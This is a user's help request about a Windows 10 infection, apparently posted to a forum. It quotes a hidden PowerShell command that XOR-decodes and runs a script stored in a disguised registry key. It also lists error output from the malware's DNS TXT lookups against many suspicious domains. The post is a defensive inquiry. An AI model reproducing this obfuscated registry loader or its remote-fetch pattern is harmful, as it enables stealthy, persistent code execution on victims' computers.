3Oca
Where can I find the launcher for this virus that uses Powershell?
On my Windows 10 PC after about 30 minutes of being turned on I always get a powershell window that immediately hides and consumes a lot of RAM.
So I went to the powershell directory:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
And with the program What's locking this file? on powershell.exe I got the PID of the process and the command that has been executed:
powershell.exe
Process ID: 2140
Command Line: powershell.exe -winDOWSTYLE hIDdEn -COmMAND "ICM ([sCRIPtbLOCk]::cREatE([StRing]::JoIN('', ((get-itempROperTy -paTH 'hklM:\SoFTWare\DOCKEr InC.XzPOAG').'XzPOAGWm' | % { [char]($_ -bXOr 179) }))))"
Since I have the PID, with Autohokey I forced the window to show and I got the following:
Resolve-DnsName : wmail-endpoint.com : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (wmail-endpoint.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : bideo-blog.com : Error de servidor DNS
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (bideo-blog.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : privatproxy-blog.com : Error de servidor DNS
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-blog.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : privatproxy-cdn.com : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-cdn.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : ahoravideo-chat.com : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-chat.com:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : fairu-blog.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (fairu-blog.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : fairu-chat.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (fairu-chat.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : fairu-cdn.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (fairu-cdn.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : bideo-blog.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (bideo-blog.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : bideo-schnellvpn.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (bideo-schnellvpn.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : privatproxy-endpoint.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-endpoint.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : privatproxy-chat.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (privatproxy-chat.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : ahoravideo-blog.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-blog.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : ahoravideo-chat.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-chat.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
Resolve-DnsName : ahoravideo-cdn.xyz : El nombre DNS no existe
En línea: 8 Carácter: 16
+ $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (ahoravideo-cdn.xyz:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
From what I understand it tries to connect to a server to send my screen (or worse it is a ransomware) but the URLs are no longer useful, I guess the law gave them down or something like that.
In the command it says Docker, however I do not use Docker, so for sure it is just a name to mislead, I already made sure to delete that registry key although I saved a copy, the content was a binary of 19Kb approximately.
After a while it runs these two commands:
powershell.exe
Process ID: 3192
Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
powershell.exe
Process ID: 6628
Command Line: "powershell.exe"
And what intrigues me here is what is the intention of these last two commands? although the PID is available it was impossible for me to force the window to show.
Ok, up to here the debug, what I want to know is, based on this information how do I find the launcher? because even if I deleted the registry found in the first command, the launcher is still running.
